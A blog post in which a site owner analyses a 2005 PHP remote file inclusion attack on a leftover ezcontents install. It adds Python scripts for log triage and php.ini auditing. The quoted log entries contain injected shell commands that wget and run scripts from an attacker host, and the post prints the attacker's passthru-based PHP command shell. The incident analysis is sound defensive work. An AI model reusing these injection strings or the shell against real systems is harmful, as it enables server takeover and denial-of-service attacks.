More details on php exploit from last week



Ok. I have a bit of time that I can sit down and get a little more detailed on what specifically happened late last week that shut the site down for a couple days.

At one point I had updated the ezcontents script for the main site (averyjparker.com), but I had left (for about 2 years) a testbed install at averyjparker.com/ncgen2, set up as a platform for an upgrade of the old genealogy site (www.averyjparker.com/ncgen; the new site is now at www.northcarolinagenealogy.net, linked at the top of the page). OK, so in searching through the logs, here are some of the entries that caught my attention.

63.85.41.229 - - [14/Jul/2005:13:30:31 -0600] "POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1" 403 319 "http://www.averyjparker.com/" "-"
200.174.133.132 - - [14/Jul/2005:13:11:59 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:19 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;%20chmod%20777%20pdr;%20./pdr HTTP/1.1" 200 1072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:42 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:21 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=wget HTTP/1.1" 200 1120 "-" "Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)"

I guess I should preface this with a simple fact: there are a LOT of exploit attempts that show up in webserver logs. Here's a sample of one…
211.75.91.2 - - [14/Jul/2005:13:30:24 -0600] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 290 "http://www.averyjparker.com/" "-"

The first entry is the IP address, then the datestamp, then the specific request (usually starting with POST or GET and ending with the version of the protocol). Next you see 404: that's the result code, and a 404 code means that this file wasn't found.

What troubled me about the suspicious entries is that the result code was 200 (file found) and they were trying to pass various bits of information to a PHP file (/ncgen2//include/db.php) which did exist.
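The triage described above by eye (a 200 on a PHP file that exists, a URL stuffed into a GLOBALS[...] parameter, a cmd= parameter carrying wget and perl) can be scripted. The following is an added example, not code from this post or from the hosting provider: the regular expression for the Apache combined log format, the indicator names and the verdict rule are my own, and the sample input is three of the entries quoted above plus one constructed benign request.

```python
"""Triage Apache combined-format access log lines for remote file inclusion
(RFI) and command injection indicators.

Added example: the parsing and scoring are my own, not the post's or the
hosting provider's tooling.  The log format and the three indicators
(a URL as a parameter value, a cmd= parameter carrying a shell command,
a GLOBALS[...] key) come from the entries quoted in the post.
"""
import re
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
SHELL_META = re.compile(r'[;|`]|&&|\$\(')
FETCH_OR_RUN = re.compile(r'\b(wget|curl|chmod|perl|sh|bash)\b')

# Sample input: three lines quoted in the post plus one constructed benign request.
SAMPLE_LOG = "\n".join([
    '211.75.91.2 - - [14/Jul/2005:13:30:24 -0600] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 290 "http://www.averyjparker.com/" "-"',
    '200.174.133.132 - - [14/Jul/2005:13:09:21 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=wget HTTP/1.1" 200 1120 "-" "Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)"',
    '200.174.133.132 - - [14/Jul/2005:13:12:19 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;%20chmod%20777%20pdr;%20./pdr HTTP/1.1" 200 1072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"',
    '10.0.0.5 - - [14/Jul/2005:14:00:00 -0600] "GET /ncgen2/index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',  # constructed, benign
])


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def parse_query(target):
    """Split the request target into its path and decoded (key, value) pairs.

    Splitting on '&' by hand instead of urllib.parse.parse_qsl keeps a literal
    ';' inside a value intact, which is exactly what an injected command contains.
    """
    path, _, query = target.partition('?')
    params = []
    for pair in query.split('&'):
        if pair:
            key, _, value = pair.partition('=')
            params.append((unquote_plus(key), unquote_plus(value)))
    return path, params


def indicators(params):
    """Name the RFI / command-injection indicators present in the parameters."""
    found = []
    for key, value in params:
        if 'GLOBALS[' in key:                      # overwriting a script variable via register_globals
            found.append('globals-override:' + key)
        if REMOTE_URL.match(value):                # a URL where a path or name is expected
            found.append('remote-url:' + key)
        if key == 'cmd' or (SHELL_META.search(value) and FETCH_OR_RUN.search(value)):
            found.append('shell-command:' + key)
    return found


def triage(log_text):
    """Return one finding per line that carries indicators.

    A 200 on such a request is the alarming case: the targeted script exists and
    answered.  A 404 is only an attempt against a file that is not there.
    """
    findings = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        path, params = parse_query(fields['target'])
        hits = indicators(params)
        if not hits:
            continue
        findings.append({
            'ip': fields['ip'],
            'time': fields['ts'],
            'path': path,
            'status': int(fields['status']),
            'indicators': hits,
            'verdict': 'likely executed' if fields['status'] == '200' else 'attempt only',
        })
    return findings


def by_source(findings):
    """Count findings per source address, to see who keeps coming back."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f['time'], f['ip'], f['path'], f['status'], f['verdict'], f['indicators'])
    print(by_source(results))
```

Run against a real access_log, the script is only a first pass: the 200 verdict tells you the script answered, not what it did, so the next step is still to pull the file the parameter points at and read the server's error log for the same timestamps.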

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load this file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file, by the way). It's basically an HTML file wrapped around this…
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
// $cmd and $chdir arrive straight from the query string, because register_globals is on
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
// the command output is HTML-escaped so it displays in the browser
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
OK, so they're trying to inject this file http://www.caniggiamatador.com/dos.pl and http://www.caniggiamatador.com/perldos.pl

I looked at the code there, and they were basically bash scripts that set up a denial of service attack on a specified target. Fairly clever, and commented in Portuguese or Spanish. I've actually spent some time studying Spanish, but there was a lot that was either misspelled or that I simply didn't understand.

The site is down now, by the way. It looks like it was hosted by http://www.internetters.net/, and I suspect my service provider dealt with contacting them.

Since I'm a fairly curious person, I was also interested in the IP address that was originating the requests, 200.174.133.132. An IP whois lookup turned up this…

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I'm guessing a dialup(?) customer in Brazil (which might back up the comments being in Portuguese).

I, of course, sent what I found to my service provider. They thanked me for the time I'd spent researching the issue, verified that this was the file they were exploiting, and confirmed that it was a DoS attack against their nameservers. They also sent along a couple of notes on changes to the php.ini that they made to blunt the attack.

disabled_functions: system, cmd, shell_exec, passthru, popen

These changes were made in the hope of preventing a future breach by the same method.
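A small audit script for that php.ini change, as an added example (my own code, not the provider's actual change). It assumes the real directive name, disable_functions, under which the provider's list is reproduced, and it also checks register_globals and allow_url_fopen, because those two settings are what let a query-string GLOBALS[rootdp]=http://... overwrite a script variable and let include() fetch lila.jpg from another host; exec and proc_open are my additions to the function list, the thresholds are my choice, and both ini fragments are constructed.

```python
"""Audit a php.ini fragment for the settings behind this kind of attack.

Added example: my own code, not the hosting provider's change.  It assumes
the real directive name, disable_functions, and the checks below are my choice.
"""
SHELL_FUNCTIONS = {'system', 'shell_exec', 'passthru', 'popen',   # from the provider's list
                   'exec', 'proc_open'}                          # added: these reach a shell too

# register_globals let GLOBALS[rootdp]= in the query string overwrite a script
# variable; allow_url_fopen let include() fetch the remote "image" and run it.
# allow_url_include is the separate switch newer PHP releases use for include().
MUST_BE_OFF = ('register_globals', 'allow_url_fopen', 'allow_url_include')
ON_VALUES = {'1', 'on', 'true', 'yes'}

WEAK_INI = """\
; constructed: a permissive PHP 4-era configuration
register_globals = On
allow_url_fopen = On
disable_functions =
"""

HARDENED_INI = """\
; constructed: after the kind of change the provider described
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off
disable_functions = system, shell_exec, passthru, popen, exec, proc_open
"""


def parse_ini(text):
    """Return {directive: value} from php.ini text; ';' starts a comment."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('['):
            continue
        key, _, value = line.partition('=')
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value):
    """php.ini accepts several spellings of a true value."""
    return value.strip().lower() in ON_VALUES


def audit(ini_text):
    """Return a list of problems; an empty list means the fragment passes."""
    settings = parse_ini(ini_text)
    problems = []
    for directive in MUST_BE_OFF:
        value = settings.get(directive)
        if value is None:
            problems.append(f'{directive} is not set; it falls back to the build default')
        elif is_on(value):
            problems.append(f'{directive} is On')
    disabled = {f.strip().lower()
                for f in settings.get('disable_functions', '').split(',') if f.strip()}
    missing = sorted(SHELL_FUNCTIONS - disabled)
    if missing:
        problems.append('disable_functions leaves enabled: ' + ', '.join(missing))
    return problems


if __name__ == '__main__':
    for name, text in (('weak', WEAK_INI), ('hardened', HARDENED_INI)):
        print(name, audit(text) or 'OK')
```

disable_functions only blocks the calls the shell happens to use; the setting that actually closes the door the attacker walked through is register_globals = Off, which this check reports separately.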

Some details of the exploit can be found here: ezcontents code injection vulnerability

So, how did they find my site to attack? Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.
